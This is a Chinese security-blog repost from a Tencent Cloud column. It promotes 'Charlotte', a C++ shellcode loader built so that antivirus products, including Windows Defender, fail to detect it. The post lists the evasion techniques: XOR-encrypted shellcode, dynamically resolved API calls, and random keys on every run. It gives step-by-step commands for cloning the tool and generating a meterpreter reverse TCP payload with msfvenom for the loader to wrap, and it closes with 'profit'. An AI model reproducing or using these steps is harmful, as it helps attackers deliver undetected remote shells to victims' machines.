文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布
社区首页 >专栏 >免杀 0/26 Charlotte C++ Shellcode 加载器

免杀 0/26 Charlotte C++ Shellcode 加载器

作者头像
Khan安全团队
发布2021-05-28 15:51:05
发布2021-05-28 15:51:05
2.3K0
举报
文章被收录于专栏:Khan安全团队Khan安全团队

2021年5月13日:

  1. c ++ shellcode启动器,截至2021年5月13日完全未检测到0/26。
  2. 动态调用win32 api函数
  3. Shellcode和函数名称的XOR加密
  4. 每次运行随机XOR键和变量
  5. 在Kali Linux上,只需“ apt-get install mingw-w64 *”就可以了!

2021年5月17日:

1.随机字符串长度和XOR键长度

用法

git克隆存储库,使用beacon.bin命名生成您的shellcode文件,然后运行charlotte.py

例子:

  1. git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
  2. cd charlotte
  3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -f raw > beacon.bin
  4. python charlotte.py
  5. profit

更新v1.1

2021/05/21:

显然,Microsoft Windows Defender能够检测到.DLL二进制文件,以及他们如何标记它?通过寻找几个16字节大小的XOR键将其更改为以下POC .gif中显示的9表示现在再次未被检测到。

项目地址:

https://github.com/9emin1/charlotte

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-05-23,如有侵权请联系 cloudcommunity@tencent.com 删除
https
github
git
apt-get
python

本文分享自 Khan安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

https
github
git
apt-get
python
评论
登录后参与评论
0 条评论
热度
最新
登录 后参与评论
推荐阅读
目录
  • 更新v1.1
领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 粤公网安备44030502008569号

腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档

Copyright © 2013 - 2026 Tencent Cloud.

All Rights Reserved. 腾讯云 版权所有

登录 后参与评论